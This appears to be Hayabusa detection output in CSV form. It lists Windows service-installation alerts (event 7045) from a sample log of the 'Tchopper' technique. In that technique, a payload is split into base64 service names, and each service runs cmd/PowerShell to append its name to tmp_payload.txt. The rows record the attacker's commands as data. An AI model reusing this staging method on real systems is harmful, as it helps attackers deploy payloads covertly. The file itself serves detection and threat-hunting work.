2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:35.638 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJyb3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg139"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:37.081 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOiAkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICB9DQp9DQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg140"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:38.534 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KI0Z1bmN0aW9uIHdpbGwgZ2VuZXJhdGUgb3V0cHV0IGluZm8gZm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg141"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:39.987 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 9yIHRoZSBnaXZlbiBsb2cuIEF2ZywgU3VnZ2VzdGVkIFByb2ZpbGUsIGV0Yy4uLg0KDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAgICAgLT4gIFRoZSBFdmVudCBMb2cNCiNAcGFyYW0gJEF2Z0V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg142"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:41.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50c1BlclNlY29uZCAtPiAgVGhlIGF2ZyBldmVudHMgcGVyIHNlY29uZCBmb3IgdGhlIGdpdmVuIGxvZw0KI0BwYXJhbSAkVG90YWxMb2dFdmVudHMgICAgIC0+ICBUaGUgdG90YWwgIyBvZiBldm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg143"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:42.889 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VudHMgZm9yIHRoZSBnaXZlbiBsb2cNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg144"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:44.332 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBFeHBvcnQtTG9nUmVwb3J0IHsgcGFyYW0oJENvbXB1dGVybGlzdCwgJENvbXB1dGVyQ291bnQsICRDb21wdXRlckxpc3RUeXBlKSAgICANCg0KICAgIHRyeS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg145"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:45.778 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: B7DQogICAgICAgIA0KICAgICAgICAkUmVwb3J0ID0gQ3JlYXRlLUxvZ1JlcG9ydCAkQ29tcHV0ZXJsaXN0ICRDb21wdXRlckNvdW50ICRDb21wdXRlckxpc3RUeXBlDQoNCiAgICAgICAgJE91dHB1 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg146"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:47.225 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dFRhYmxlID0gZm9yZWFjaCAoJGJveCBpbiAkUmVwb3J0LkdldEVudW1lcmF0b3IoKSkgeyANCg0KICAgICAgICAgICAgTmV3LU9iamVjdCBQU09iamVjdCAtUHJvcGVydHkgKFtvcmRlcmVkXUB7DQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg147"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:48.663 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ogICAgICAgICAgICAiU2VydmVyIiA9ICRib3guTmFtZTsgIk9TIFZlcnNpb24iID0gJGJveC5WYWx1ZS5PU1ZlcnNpb247IA0KICAgICAgICAgICAgIkFwcGxpY2F0aW9uIChFUFMpIiA9ICRib3gu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg148"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:50.135 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VmFsdWUuQXBwbGljYXRpb25FUFM7ICJBcHBsaWNhdGlvbiAxc3QgRXZlbnQiID0gJGJveC5WYWx1ZS5BcHBsaWNhdGlvbkZpcnN0RXZlbnRUaW1lOyAiQXBwbGljYXRpb24gbGFzdCBFdmVudCIgPS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg149"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:18:51.588 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkYm94LlZhbHVlLkFwcGxpY2F0aW9uTGFzdEV2ZW50VGltZTsgIkFwcGxpY2F0aW9uIHRvdGFsIGV2ZW50cyIgPSAkYm94LlZhbHVlLkFwcGxpY2F0aW9uVG90YWxFdmVudHM7ICJBcHBsaWNhdGlv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg150"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
